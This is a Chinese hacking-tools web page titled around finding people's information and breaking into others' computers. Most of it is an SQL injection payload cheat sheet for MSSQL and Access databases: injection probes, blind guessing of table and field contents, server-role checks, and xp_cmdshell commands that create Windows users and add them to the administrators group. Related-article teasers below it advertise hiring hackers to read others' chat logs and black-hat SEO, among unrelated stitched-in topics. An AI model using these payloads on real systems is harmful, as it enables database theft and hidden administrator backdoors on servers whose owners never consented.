黑客怎么找某人信息-黑客怎么进去别人电脑(黑客是如何黑进

访客4年前黑客工具756

1.判断是否有注入
;and1=1
;and1=2

2.初步判断是否是mssql
;anduser>0

3.注入参数是字符
'and[查询条件]and''='

4.搜索时没过滤参数的
'and[查询条件]and'%25'='

5.判断数据库系统
;and(selectcount(*)fromsysobjects)>0mssql
;and(selectcount(*)frommsysobjects)>0access

6.猜数据库
;and(SelectCount(*)from[数据库名])>0

7.猜字段
;and(SelectCount(字段名)from数据库名)>0

8.猜字段中记录长度
;and(selecttop1len(字段名)from数据库名)>0

9.(1)猜字段的ascii值(access)
;and(selecttop1asc(mid(字段名,1,1))from数据库名)>0

(2)猜字段的ascii值(mssql)
;and(selecttop1unicode(substring(字段名,1,1))from数据库名)>0

10.测试权限结构(mssql)
;and1=(SelectIS_SRVROLEMEMBER('sysadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('serveradmin'));--
;and1=(SelectIS_SRVROLEMEMBER('setupadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('securityadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('diskadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('bulkadmin'));--
;and1=(SelectIS_MEMBER('db_owner'));--

11.添加mssql和系统的帐户
;execmaster.dbo.sp_addloginusername;--
;execmaster.dbo.sp_passwordnull,username,password;--
;execmaster.dbo.sp_addsrvrolemembersysadminusername;--
;execmaster.dbo.xp_cmdshell'netuserusernamepassword/workstations:*/times:all/passwordchg:yes/passwordreq:yes/active:yes/add';--
;execmaster.dbo.xp_cmdshell'netuserusernamepassword/add';--
;execmaster.dbo.xp_cmdshell'netlocalgroupadministratorsusername/add';--

相关文章

黑客380,找黑客拉票,找黑客查别人聊天记录

$at_id=(int)base64_decode($_REQUEST['id']);仿制代码是相同的作用。 二、Bypass FuzzLeadbbs: makealltopanc.asp0x01 第...

获取新增用户的2个思路:产品生命周期和用户生命周期

获取新增用户的2个思路:产品生命周期和用户生命周期

任何产物及项目都面对着新用户来历的问题,运营在产物的整个生命周期内都要举办拉新的事情,需要在差异阶段拟定出适合的计策引发更多新用户的插手。 用户第一次发生产物或项目界说的新行为都可称为拉新,来看看一些...

籍贯是什么意思,籍贯怎么填写才正确

籍贯是什么意思,籍贯怎么填写才正确

      “籍贯”在如今的社会中已经没有什么价值了,但在法律意义上仍然是个人资料之一,而且有严格的定义。   籍贯   籍贯是指祖居地(祖籍地)或原来籍贯。参照公安部公通字...

记一次阿里云主机accesskey泄露到图形化工具开发

记一次阿里云主机accesskey泄露到图形化工具开发

简介在日常渗透过程中我们经常遇到信息泄露出ALIYUN_ACCESSKEYID与ALIYUN_ACCESSKEYSECRET(阿里云API key),特别是laravel框架得debug信息。APP中...

贾玲高情商回应催婚 你有过被催婚的经历吗?

2月22日,据报道,贾玲执导的电影《你好李焕英》票房突破40亿,已反超《唐探3》。贾玲路演遭粉丝催婚,一位成都妈妈表示:“我来八卦一下,你看我们差不多大,我都有两个孩子了,...

黑帽seo手艺跳转

咨询一个seo手艺,算不算黑帽seo。就是我在内容页头部加入js代码直接跳转到首页。现实用户是打不 这算作弊,而且还不是黑帽seo,黑帽seo是快速抄获得排名的手艺,然则网站被责罚也是早晚的事情。 内...